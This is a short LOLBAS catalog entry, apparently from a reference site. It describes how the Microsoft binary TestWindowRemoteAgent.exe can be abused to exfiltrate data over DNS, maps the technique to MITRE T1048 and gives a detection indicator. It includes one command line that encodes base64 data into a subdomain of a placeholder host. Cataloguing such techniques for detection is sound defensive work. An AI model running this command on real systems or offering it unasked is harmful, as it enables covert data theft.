Catalog LOLBAS

LOL · OtherMSBinary

TestWindowRemoteAgent.exe

1 technique WindowsLOLBAS GPL-3.0

Upload

File Upload Windows

Sends DNS query for open connection to any host, enabling exfiltration over DNS

Use Attackers may utilize this to exfiltrate data over DNS

TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
Context
user
Native
Upload
MITRE
T1048
Detection
IOC: TestWindowRemoteAgent.exe spawning unexpectedly